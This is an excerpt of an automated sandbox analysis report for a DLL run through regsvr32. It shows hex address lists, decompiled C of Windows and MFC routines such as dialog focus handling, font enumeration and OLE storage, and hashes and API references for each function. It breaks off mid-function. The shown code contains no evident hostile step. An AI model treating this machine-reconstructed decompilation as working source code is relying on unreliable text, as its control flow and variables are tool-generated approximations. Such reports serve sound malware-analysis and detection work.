                                                                                                                0x1001328e
                                                                                                                0x10013294
                                                                                                                0x10013311
                                                                                                                0x1001331e
                                                                                                                0x1001332b
                                                                                                                0x10013338
                                                                                                                0x1001334d
                                                                                                                0x1001335f
                                                                                                                0x10013371
                                                                                                                0x10013387
                                                                                                                0x10013296
                                                                                                                0x10013298
                                                                                                                0x100132a5
                                                                                                                0x100132b2
                                                                                                                0x100132bf
                                                                                                                0x100132d4
                                                                                                                0x100132e6
                                                                                                                0x100132f8
                                                                                                                0x1001330e
                                                                                                                0x1001330e

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$EnableWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1554173715-0
                                                                                                                • Opcode ID: c2cec1cd44ac62786b436350435a1d8a5207680524d3cffbbe0ad7906cb20fd2
                                                                                                                • Instruction ID: f49919012713f552dc54165cbc2937a4fa5191b9d5ae3baf8d8e0e57b26a6ac4
                                                                                                                • Opcode Fuzzy Hash: c2cec1cd44ac62786b436350435a1d8a5207680524d3cffbbe0ad7906cb20fd2
                                                                                                                • Instruction Fuzzy Hash: 74211D353C0702BAF534F6748C93FE7A394AF94B00F114919B35AAE0D48EF0B5859765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002B366 Relevance: 13.6, APIs: 9, Instructions: 62windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002B366(intOrPtr* __ecx, struct HWND__* _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				struct HWND__* _t22;
				int _t26;
				struct HWND__* _t32;
				signed int _t33;
				void* _t37;
				intOrPtr* _t38;

				_t38 = __ecx;
				if(( *(__ecx + 0x58) & 0x01000020) == 0) {
					L8:
					return E10019B72(_t32, _t38, _t37, _t47);
				}
				_t37 = GetDlgItem;
				_t32 = GetDlgItem( *(__ecx + 0x20), _a4);
				if(_t32 == 0 || (GetWindowLongA(_t32, 0xfffffff0) & 0x10000000) == 0 || IsWindowEnabled(_t32) == 0) {
					_t33 = 0;
					while(1) {
						_t22 = GetDlgItem( *(_t38 + 0x20),  *(0x1005c7b4 + _t33 * 4));
						_a4 = _t22;
						if((GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) != 0 && IsWindowEnabled(_a4) != 0) {
							break;
						}
						_t33 = _t33 + 1;
						_t47 = _t33 - 4;
						if(_t33 < 4) {
							continue;
						}
						goto L8;
					}
					_t26 = IsWindowEnabled(GetFocus());
					__eflags = _t26;
					if(_t26 == 0) {
						SetFocus(_a4);
					}
					return  *((intOrPtr*)( *_t38 + 0x110))(0x401,  *(0x1005c7b4 + _t33 * 4), _a8);
				} else {
					goto L8;
				}
			}












                                                                                                                0x1002b369
                                                                                                                0x1002b373
                                                                                                                0x1002b3d9
                                                                                                                0x00000000
                                                                                                                0x1002b3db
                                                                                                                0x1002b379
                                                                                                                0x1002b38a
                                                                                                                0x1002b38e
                                                                                                                0x1002b3a7
                                                                                                                0x1002b3a9
                                                                                                                0x1002b3b3
                                                                                                                0x1002b3b8
                                                                                                                0x1002b3c3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002b3d3
                                                                                                                0x1002b3d4
                                                                                                                0x1002b3d7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002b3d7
                                                                                                                0x1002b3ee
                                                                                                                0x1002b3f4
                                                                                                                0x1002b3f6
                                                                                                                0x1002b3fc
                                                                                                                0x1002b3fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 1002B382
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 1002B393
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 1002B39D
                                                                                                                • GetDlgItem.USER32(?), ref: 1002B3B3
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 1002B3BC
                                                                                                                • IsWindowEnabled.USER32(?), ref: 1002B3C9
                                                                                                                • GetFocus.USER32 ref: 1002B3E7
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 1002B3EE
                                                                                                                • SetFocus.USER32 ref: 1002B3FC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enabled$FocusItemLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 1558694495-0
                                                                                                                • Opcode ID: 3042f9cf57d70c34d1a5a14e4d33563231f7e979698b23aaf5880a16e59787f8
                                                                                                                • Instruction ID: 0fdb7c567a1c28fb62654af88f4cf1857230a4142f0354edeab786ff91b3be13
                                                                                                                • Opcode Fuzzy Hash: 3042f9cf57d70c34d1a5a14e4d33563231f7e979698b23aaf5880a16e59787f8
                                                                                                                • Instruction Fuzzy Hash: CA118C312047169FEB51DFA5FCC9A1B7AA8EF483A5F100629F682921B1EB71DD109E11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003835D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E1003835D(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				void* _v72;
				char _v88;
				intOrPtr _v100;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				void* _t35;
				void* _t38;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				struct HDC__* _t45;
				void* _t46;
				void* _t49;
				signed int _t51;
				signed int _t54;

				_t42 = __edx;
				_t38 = __ecx;
				_t37 = __ebx;
				_t51 = _t54;
				_t15 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t15 ^ _t51;
				_t44 = __ecx;
				_v72 = 0;
				E1003BB70(__ecx,  &_v68, 0, 0x3c);
				if(E1003D360(_t44) < 0x20) {
					E1000B0F0(__ebx, _t44, 0, E1003F11F(_t42,  &(_v68.lfFaceName), 0x20, _t44));
					_v68.lfCharSet = 1;
					_v72 = 0;
					_t45 = GetDC(0);
					if(_t45 != 0) {
						EnumFontFamiliesExA(_t45,  &_v68, E10038325,  &_v72, 0);
						ReleaseDC(0, _t45);
					}
					_pop(_t46);
					_pop(_t49);
					return E1003B437(_v72, _t37, _v8 ^ _t51, _t42, _t46, _t49);
				} else {
					_push(_t51);
					_push(_t38);
					_v88 = 0x1006c938;
					E1003D2F0( &_v88, 0x1006522c);
					asm("int3");
					_push(4);
					E1003D1E6(E10052A8D, __ebx, _t44, 0);
					_t41 = E1002D12C(0x104);
					_v100 = _t41;
					_t35 = 0;
					_v88 = 0;
					if(_t41 != 0) {
						_t35 = E10022AE3(_t41);
					}
					return E1003D2BE(_t35);
				}
			}






















                                                                                                                0x1003835d
                                                                                                                0x1003835d
                                                                                                                0x1003835d
                                                                                                                0x1003835e
                                                                                                                0x10038363
                                                                                                                0x1003836a
                                                                                                                0x10038378
                                                                                                                0x1003837a
                                                                                                                0x1003837d
                                                                                                                0x1003838e
                                                                                                                0x100383a2
                                                                                                                0x100383ab
                                                                                                                0x100383af
                                                                                                                0x100383b8
                                                                                                                0x100383bc
                                                                                                                0x100383cd
                                                                                                                0x100383d5
                                                                                                                0x100383d5
                                                                                                                0x100383e1
                                                                                                                0x100383e4
                                                                                                                0x100383eb
                                                                                                                0x10038390
                                                                                                                0x1001729e
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1003837D
                                                                                                                • _strlen.LIBCMT ref: 10038383
                                                                                                                • _strcpy_s.LIBCMT ref: 1003839C
                                                                                                                • GetDC.USER32(00000000), ref: 100383B2
                                                                                                                • EnumFontFamiliesExA.GDI32(00000000,?,10038325,?,00000000), ref: 100383CD
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 100383D5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumFamiliesFontRelease_memset_strcpy_s_strlen
                                                                                                                • String ID: MS UI Gothic
                                                                                                                • API String ID: 2896007982-1905310704
                                                                                                                • Opcode ID: 0949dc94256b216e0b4725ae6a45af698669781c0097452b3c5c03d86277a9c5
                                                                                                                • Instruction ID: 8f9736bb319d707899cce2883d6eceffab4a40fe6c555caaa6ff42b430ff71cf
                                                                                                                • Opcode Fuzzy Hash: 0949dc94256b216e0b4725ae6a45af698669781c0097452b3c5c03d86277a9c5
                                                                                                                • Instruction Fuzzy Hash: A501C876900228AFDB11DBA49C49DEF77BDEF49A00F100015F905E7241DB74BB018765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100302A0 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E100302A0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E1003D1E6(E100544D8, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E1002EBD2(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x1005faa4, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E1003D2BE(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x1005fb34, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E10020058(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E100359F9(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E1002001A(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x1005fb44);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E1002E9D9(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x1005fa54, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}











































                                                                                                                0x100302a0
                                                                                                                0x100302a7
                                                                                                                0x100302ac
                                                                                                                0x100302ae
                                                                                                                0x100302b3
                                                                                                                0x100302b8
                                                                                                                0x100302bb
                                                                                                                0x100302dc
                                                                                                                0x100302e2
                                                                                                                0x100302e5
                                                                                                                0x100302e8
                                                                                                                0x100302eb
                                                                                                                0x100302f4
                                                                                                                0x100302fc
                                                                                                                0x100302ff
                                                                                                                0x10030332
                                                                                                                0x10030332
                                                                                                                0x10030337
                                                                                                                0x1003039c
                                                                                                                0x1003039f
                                                                                                                0x1003040b
                                                                                                                0x1003040b
                                                                                                                0x1003040f
                                                                                                                0x10030419
                                                                                                                0x1003041b
                                                                                                                0x1003041d
                                                                                                                0x1003056c
                                                                                                                0x1003056f
                                                                                                                0x10030589
                                                                                                                0x10030589
                                                                                                                0x1003058e
                                                                                                                0x10030593
                                                                                                                0x10030593
                                                                                                                0x10030599
                                                                                                                0x100305a0
                                                                                                                0x100305a0
                                                                                                                0x100305a7
                                                                                                                0x100305aa
                                                                                                                0x100305af
                                                                                                                0x100305af
                                                                                                                0x10030571
                                                                                                                0x10030571
                                                                                                                0x10030575
                                                                                                                0x1003057c
                                                                                                                0x1003057f
                                                                                                                0x10030584
                                                                                                                0x10030587
                                                                                                                0x10030587
                                                                                                                0x00000000
                                                                                                                0x10030575
                                                                                                                0x10030423
                                                                                                                0x10030425
                                                                                                                0x1003047f
                                                                                                                0x10030482
                                                                                                                0x10030534
                                                                                                                0x1003053b
                                                                                                                0x1003053b
                                                                                                                0x1003053e
                                                                                                                0x10030541
                                                                                                                0x10030544
                                                                                                                0x10030547
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003054c
                                                                                                                0x1003054e
                                                                                                                0x10030558
                                                                                                                0x1003055a
                                                                                                                0x10030569
                                                                                                                0x10030569
                                                                                                                0x10030558
                                                                                                                0x00000000
                                                                                                                0x1003054c
                                                                                                                0x1003048c
                                                                                                                0x1003048f
                                                                                                                0x10030491
                                                                                                                0x10030494
                                                                                                                0x100304cd
                                                                                                                0x100304cd
                                                                                                                0x100304d4
                                                                                                                0x100304d7
                                                                                                                0x100304d7
                                                                                                                0x100304da
                                                                                                                0x100304dd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100304df
                                                                                                                0x100304e8
                                                                                                                0x100304ee
                                                                                                                0x100304f0
                                                                                                                0x100304f3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100304f5
                                                                                                                0x10030501
                                                                                                                0x10030504
                                                                                                                0x1003050a
                                                                                                                0x1003050c
                                                                                                                0x1003050f
                                                                                                                0x10030511
                                                                                                                0x1003051d
                                                                                                                0x10030520
                                                                                                                0x10030526
                                                                                                                0x10030526
                                                                                                                0x10030529
                                                                                                                0x1003052c
                                                                                                                0x1003052f
                                                                                                                0x00000000
                                                                                                                0x1003052f
                                                                                                                0x10030496
                                                                                                                0x1003049d
                                                                                                                0x1003049f
                                                                                                                0x100304a5
                                                                                                                0x100304a7
                                                                                                                0x100304aa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100304ad
                                                                                                                0x100304b3
                                                                                                                0x100304b5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100304bf
                                                                                                                0x100304c5
                                                                                                                0x00000000
                                                                                                                0x100304c5
                                                                                                                0x10030498
                                                                                                                0x1003049b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003049b
                                                                                                                0x10030427
                                                                                                                0x1003042e
                                                                                                                0x10030431
                                                                                                                0x10030437
                                                                                                                0x10030439
                                                                                                                0x1003043c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10030442
                                                                                                                0x1003044f
                                                                                                                0x10030452
                                                                                                                0x10030458
                                                                                                                0x1003045a
                                                                                                                0x1003045d
                                                                                                                0x1003045f
                                                                                                                0x1003046b
                                                                                                                0x1003046e
                                                                                                                0x10030474
                                                                                                                0x10030474
                                                                                                                0x10030477
                                                                                                                0x00000000
                                                                                                                0x10030477
                                                                                                                0x100303a1
                                                                                                                0x100303a1
                                                                                                                0x100303a5
                                                                                                                0x100303af
                                                                                                                0x100303b1
                                                                                                                0x100303b3
                                                                                                                0x00000000
                                                                                                                0x100303b5
                                                                                                                0x100303b5
                                                                                                                0x100303b7
                                                                                                                0x100303d3
                                                                                                                0x100303df
                                                                                                                0x100303e2
                                                                                                                0x100303e7
                                                                                                                0x100303f1
                                                                                                                0x100303f4
                                                                                                                0x100303f4
                                                                                                                0x100303f4
                                                                                                                0x100303fb
                                                                                                                0x100303fe
                                                                                                                0x100303b9
                                                                                                                0x100303b9
                                                                                                                0x100303c2
                                                                                                                0x100303c2
                                                                                                                0x10030403
                                                                                                                0x00000000
                                                                                                                0x10030403
                                                                                                                0x100303b3
                                                                                                                0x1003033c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10030342
                                                                                                                0x10030349
                                                                                                                0x1003034a
                                                                                                                0x1003034f
                                                                                                                0x10030354
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10030358
                                                                                                                0x10030359
                                                                                                                0x1003035a
                                                                                                                0x1003035b
                                                                                                                0x10030364
                                                                                                                0x00000000
                                                                                                                0x10030366
                                                                                                                0x10030375
                                                                                                                0x10030378
                                                                                                                0x1003037b
                                                                                                                0x10030388
                                                                                                                0x1003038b
                                                                                                                0x10030391
                                                                                                                0x10030394
                                                                                                                0x00000000
                                                                                                                0x10030394
                                                                                                                0x10030364
                                                                                                                0x10030301
                                                                                                                0x1003030c
                                                                                                                0x10030316
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10030318
                                                                                                                0x10030324
                                                                                                                0x10030329
                                                                                                                0x1003032c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003032c
                                                                                                                0x100302cc
                                                                                                                0x100302d3
                                                                                                                0x100302d6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100302A7
                                                                                                                  • Part of subcall function 1002E9D9: SysStringLen.OLEAUT32(?), ref: 1002E9E1
                                                                                                                  • Part of subcall function 1002E9D9: CoGetClassObject.OLE32(?,?,00000000,1005F984,?), ref: 1002E9FF
                                                                                                                • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10030431
                                                                                                                • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10030452
                                                                                                                • GlobalAlloc.KERNEL32(00000000,00000000), ref: 1003049F
                                                                                                                • GlobalLock.KERNEL32 ref: 100304AD
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 100304C5
                                                                                                                • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 100304E8
                                                                                                                • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10030504
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 317715441-0
                                                                                                                • Opcode ID: 60c1ff899a70c2082574f0bf6dfbe2f6096368b3e89200d94ea2070098720afc
                                                                                                                • Instruction ID: 2c725d1e2788cf00e1291c633ca5e0efe4e8062dfd95c9fc4e137c500c7b4efa
                                                                                                                • Opcode Fuzzy Hash: 60c1ff899a70c2082574f0bf6dfbe2f6096368b3e89200d94ea2070098720afc
                                                                                                                • Instruction Fuzzy Hash: 1CC1E3B0A0124AEFDB01CFA4C8989AEBBB9FF48345F504969F915EB251C771DA41CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002BB83 Relevance: 12.1, APIs: 8, Instructions: 133windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E1002BB83(intOrPtr* __ecx, void* __edi, void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				struct HWND__* _v12;
				int _v16;
				int _v24;
				void* __ebx;
				void* __esi;
				void* __ebp;
				struct HWND__* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HWND__* _t45;
				void* _t48;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t83;
				struct HWND__* _t84;
				intOrPtr* _t86;

				_t89 = __eflags;
				_t83 = __edi;
				_t86 = __ecx;
				E1001C7A2(_t68, __ecx, __edi, __ecx, __eflags, 0x10);
				E1001C7A2(_t68, __ecx, __edi, __ecx, _t89, 0x7c000);
				 *((intOrPtr*)( *__ecx + 0x140))();
				_t41 =  *((intOrPtr*)(E10023187(_t68, __edi, __ecx, _t89) + 4));
				_v12 = _t41;
				if(_t41 != 0) {
					E100216B4(_t41, 0);
				}
				_t42 =  *((intOrPtr*)(_t86 + 0xa0));
				if(_t42 != 0) {
					_t43 =  *((intOrPtr*)(_t42 + 0x20));
